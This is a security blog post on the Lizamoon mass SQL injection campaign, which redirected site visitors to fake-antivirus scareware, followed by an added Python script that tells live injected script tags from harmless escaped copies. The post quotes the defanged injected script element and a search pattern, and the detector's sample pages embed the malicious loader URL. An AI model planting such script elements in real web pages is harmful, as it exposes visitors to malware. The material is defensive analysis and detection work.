What’s the deal with the Lizamoon SQL injection?

The moon at about 3/4 phase

There has been a large amount of press in the last few days regarding lizamoon. The following code was injected into a large number of websites:

<script src=hxxp://lizamoon . com / ur . php >

At the time of writing, various other domains are being used, not just lizamoon.

The script loaded from the compromised web pages redirects the user to a malicious site. Ultimately, the attack is intended to infect users with fake AV (scareware). The distribution sites typically use the “.cc” (Cocos Islands) or “.in” (India) TLDs.

Sophos Perspective

SophosLabs have been monitoring these attacks and have protected customers in several ways:

  • detecting the fake AV pages as Mal/FakeAVJS-A
  • detecting the fake AV payload as Mal/FakeAV-IP
  • blocking access to the known sites used in this attack with URL filtering at the endpoint and web gateway

Additionally, detection for web pages injected with the malicious script element has been released today as Troj/Badsrc-L.

Current scope of the problem

If you do a Google search for:

"<script src=http://*/ur.php"

you get a large number of hits.

This frightening volume may be a little misleading, since the total is inflated by occurrences of the following HTML within the compromised web pages:

&lt;script src=hxxp://lizamoon . com / ur . php &gt;

As you can see, the injected code has been escaped in some cases, rendering the injection harmless.
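As an added example (not code from the original Sophos post), the following Python script makes the distinction described above when checking a page: a live injected script element that the browser would execute versus an entity-escaped copy that is rendered as text and is harmless. The sample pages are constructed for this example; the host and path are the ones named in the post, and the matching is deliberately host-agnostic because other domains were used as well.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages (not captured from real sites). The host and path
# are the ones named in the post; everything around them is made up.
LIVE_PAGE = ('<html><body><h1>Shop</h1>'
             '<script src=http://lizamoon.com/ur.php ></script>'
             '</body></html>')
ESCAPED_PAGE = ('<html><body><p>Product notes: '
                '&lt;script src=http://lizamoon.com/ur.php &gt;</p>'
                '</body></html>')
CLEAN_PAGE = '<html><body><script src="/static/app.js"></script></body></html>'

# Matches the injected loader on any host, like the "http://*/ur.php" search
# in the post. Other domains were in use too, so the host is not pinned.
INJECTED_SRC = re.compile(r'^https?://[^/\s]+/ur\.php$', re.IGNORECASE)
INJECTED_TEXT = re.compile(
    r'<script\s+src=["\']?(https?://[^/\s"\']+/ur\.php)["\']?\s*>', re.IGNORECASE)


class ScriptSrcCollector(HTMLParser):
    """Records the src of every real <script> element and all text nodes."""

    def __init__(self):
        super().__init__()  # default convert_charrefs=True: entities in text are decoded
        self.script_srcs = []
        self.text_chunks = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == 'script':
            for name, value in attrs:
                if name.lower() == 'src' and value:
                    self.script_srcs.append(value.strip())

    def handle_data(self, data):
        self.text_chunks.append(data)


def classify_page(page_html):
    """Return ('live', srcs), ('escaped', srcs) or ('clean', []).

    'live' means the browser would actually execute the injected element;
    'escaped' means the injection survived only as entity-escaped text
    (&lt;script ...&gt;), which the browser displays but does not run.
    """
    parser = ScriptSrcCollector()
    parser.feed(page_html)
    parser.close()
    live = [s for s in parser.script_srcs if INJECTED_SRC.match(s)]
    if live:
        return 'live', live
    # Because the parser decodes entities, an escaped injection shows up in
    # the text nodes as a literal "<script src=...>" string, never as a tag.
    escaped = INJECTED_TEXT.findall(''.join(parser.text_chunks))
    if escaped:
        return 'escaped', escaped
    return 'clean', []


def triage(pages):
    """Count pages by status, the split that a raw search-hit total hides."""
    counts = {'live': 0, 'escaped': 0, 'clean': 0}
    for page in pages:
        counts[classify_page(page)[0]] += 1
    return counts


if __name__ == '__main__':
    for name, page in (('live', LIVE_PAGE), ('escaped', ESCAPED_PAGE), ('clean', CLEAN_PAGE)):
        print(name, '->', classify_page(page))
    print(triage([LIVE_PAGE, ESCAPED_PAGE, CLEAN_PAGE]))
```

Run it against saved copies of your own pages rather than search-engine snippets: the parser only reports 'live' for an actual script element, so an escaped hit counts toward the inflated total but not toward pages that need cleaning.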